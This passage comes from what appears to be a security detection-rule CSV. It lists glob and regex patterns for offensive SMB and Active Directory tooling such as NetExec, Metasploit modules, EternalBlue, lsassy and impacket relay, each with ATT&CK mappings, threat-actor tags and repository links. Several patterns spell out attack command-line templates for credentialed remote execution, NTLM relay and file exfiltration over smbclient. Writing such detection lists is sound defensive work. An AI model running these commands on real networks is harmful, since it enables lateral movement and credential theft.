tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" "*SmashedPotato.exe*",".{0,1000}SmashedPotato\.exe.{0,1000}","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","83","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" "*smb * -u * -p * * -M bh_owned*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sbh_owned.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*smb * -u * -p * -M ioxidresolver*",".{0,1000}smb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sioxidresolver.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*smb 1* -u * -p * -x ""whoami""*",".{0,1000}smb\s1.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-x\s\""whoami\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*smb.dcsync*",".{0,1000}smb\.dcsync.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*smb/impacket*",".{0,1000}smb\/impacket.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb/relay/ntlm*",".{0,1000}smb\/relay\/ntlm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SMB\SigningNotRequired-*.txt*",".{0,1000}SMB\\SigningNotRequired\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*smb_doublepulsar_rce.*",".{0,1000}smb_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_doublepulsar_rce.rb*",".{0,1000}smb_doublepulsar_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumshares*",".{0,1000}smb_enumshares.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumshares.*",".{0,1000}smb_enumshares\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumusers*",".{0,1000}smb_enumusers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumusers.*",".{0,1000}smb_enumusers\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_enumusers_domain.*",".{0,1000}smb_enumusers_domain\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_eternalblue*",".{0,1000}smb_eternalblue.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smb_ms17_010_pass*",".{0,1000}smb_ms17_010_pass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_pipename_stager*",".{0,1000}smb_pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*smb_rras_erraticgopher.*",".{0,1000}smb_rras_erraticgopher\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_shadow.*",".{0,1000}smb_shadow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_shadow.rb*",".{0,1000}smb_shadow\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*smb_stealth.py*",".{0,1000}smb_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*smb_win.py*",".{0,1000}smb_win\.py.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1290","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" "*smb1_anonymous_connect_ipc*",".{0,1000}smb1_anonymous_connect_ipc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smb1_anonymous_login*",".{0,1000}smb1_anonymous_login.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-smb2support --no-wcf-server --no-smb-server --no-http-server*",".{0,1000}\-smb2support\s\-\-no\-wcf\-server\s\-\-no\-smb\-server\s\-\-no\-http\-server.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*-smb2support --remove-mic --shadow-credentials --shadow-target *",".{0,1000}\-smb2support\s\-\-remove\-mic\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*smbattack.py*",".{0,1000}smbattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *",".{0,1000}smbclient\s\\\\\\\\\\\\\\\\.{0,1000}\\\\\\\\TRANSFER\s\-N\s\-p\s.{0,1000}\s\-c\s\\.{0,1000}put\s.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*smbclient -N -A *\\\\*\\*temp_out.txt*",".{0,1000}smbclient\s\-N\s\-A\s.{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}temp_out\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*smbclient.getFile('C$', 'Windows/CCM/SCNotification.exe.config*",".{0,1000}smbclient\.getFile\(\'C\$\',\s\'Windows\/CCM\/SCNotification\.exe\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*smbcrawler*",".{0,1000}smbcrawler.{0,1000}","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","135","13","2024-05-01T16:30:51Z","2021-06-09T19:27:08Z" "*SMBCrunch-master*",".{0,1000}SMBCrunch\-master.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*SMBeagle.exe*",".{0,1000}SMBeagle\.exe.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*SMBeagle.sln*",".{0,1000}SMBeagle\.sln.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbeagle_*_linux_amd64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_amd64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbeagle_*_linux_arm64.zip*",".{0,1000}smbeagle_.{0,1000}_linux_arm64\.zip.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an 